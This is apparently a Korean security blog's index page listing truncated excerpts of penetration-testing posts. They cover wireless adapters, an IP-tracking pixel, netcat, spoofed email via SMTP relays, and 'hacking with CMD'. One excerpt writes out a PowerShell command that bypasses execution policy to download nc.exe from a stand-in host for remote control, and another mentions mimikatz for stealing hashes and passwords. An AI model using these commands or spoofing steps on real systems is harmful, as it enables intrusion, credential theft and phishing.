보안 & 해킹/모의 침투(19)
-
칼리와 호환되는 무선랜 모의해킹용 랜카드 목록
리스트는 국내에서 저렴하게 구입할 수 있는 무선 랜카드 목록이다. iptime 2000UA iptime A2000U iptime N150UAiptime N100 mini Netgear A6210 해외에서는 TP-LINK TL-WN722N (비싸지만 성능이 좋음)Alfa AWUS036NHAlfa AWUS036NHAPanda PAU05Alfa AWUS051NHAlfa AWUS036NEHPanda PAU09Alfa AWUS036ACH 과 같은 제품 목록이 있다. 개인적으로는 실습 용으로는 국내용으로 충분하고 침투 테스트용이나 고성능을 원한다면 해외 제품을 추천한다. 본인은 Alfa 무선랜카드를 사용중이다. 무엇을 사용해야 할지 모르겠다면 위 표도 참고해볼 것.
2020.11.29 -
상대방의 아이피를 알아낼 수 있을까? 1PX-IP-Tracker
이것은 1px 트래커 입니다. 이상해보이는 링크만 조심하면 될까요? IP 주소는 어떻게 알아낼 수 있을까요? 테스트 용도이기 때문에 리스트에 보여지는 아이피는 *로 대체됩니다. https://github.com/whackur/simple-1px-ip-tracker 해당 페이지로 가시면 여러분 자신의 ip가 있을 겁니다. http://pi.hakhub.net:82/tracker_list_for_me 불러오는 중입니다...
2020.02.19 -
CMD로 해킹하는 7가지 방법
유튜브 영상 링크 YouTube www.youtube.com 1.ping으로 아이피주소 알아내기 2.ping으로 아이피주소 스캔하기 for /L %i in (0,1,255) do ping -n 1 -w 250 192.168.10.%i >> ipaddress.txt 3.상대방 호스트 이름 알아내기 nbtstat -A 192.168.10.1 4.파워쉘로 프로그램 받기, nc로 원격제어하기 powershell.exe -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System.Net.WebClient).DownloadFile('http://program.com/nc.exe', 'nc.exe'); 5.해시와 패스워드 알아내기 mimikatz 다운로드 후 pri..
2019.12.28 -
넷캣(netcat, nc)의 활용
유튜브 바로가기 넷캣이란? TCP/IP swiss army knife. 네트워크 해킹의 맥가이버같은 도구 netcat (혹은 nc)은 TCP 또는 UDP를 사용하여 네트워크 연결을 읽고 쓰는 데 사용되는 컴퓨터 네트워킹 유틸리티 윈도우, 리눅스, 맥 등 다른 운영체제 및 스크립트에서 직접 또는 쉽게 구동 리눅스나 맥의 경우 기본적으로 내장되어있는 경우가 대다수 네트워크 디버깅 및 조사 도구로도 사용 가능함 사용자가 필요로하는 거의 모든 종류의 연결을 생성 할 수 있고 여러 내장 기능이 있음. 기능 목록에는 포트 스캔, 파일 전송 및 포트 수신이 포함되며 백도어로 사용가능 다운로드 윈도우 바이너리 및 소스 리눅스 윈도우용 exe 파일만 받기 Sans Netcat CheetSheet 옵션 -d 콘솔에서 분리..
2019.11.17 -
SMTP 구축 없이 메일 주소를 속여서 보내기
SMTP 릴레이 서버란? 간단히 말해서, 릴레이 서버는 주요 회사가 전자우편의 인증된 송신자로 신뢰하는 SMTP 서버다. 그렇다면, SMTP 릴레이 서버를 찾는 방법은? 스푸핑된 이메일을 성공적으로 보내려면 신뢰할 수 있는 SMTP 서버를 찾아야 한다. 일반적으로 웹 호스팅 제공업체에서 보내는 모든 이메일은 신뢰되고 인증된다. 그래서 이메일을 보낼 수 있는 무료 웹 호스팅 제공자를 찾아야 한다. https://www.000webhost.com/ 현재 호스팅을 무료로 받을 수 있는 서비스다. 아래는 메일을 송신할 수 있는 php 소스코드의 압축파일이다. 자세한 내용은 영상을 참고하라.
2019.01.10 -
해커플레이북3 리마인드맵 remind map
Red Team 구성 중에 사용할 수 있는 프로세스와 기술에 중점을 두었다. 우클릭 - 새 탭에서 이미지 열기로 보세요. 출처 : https://www.marcolancini.it/2018/blog-kubernetes-CVE-2018-1002105/
2018.12.27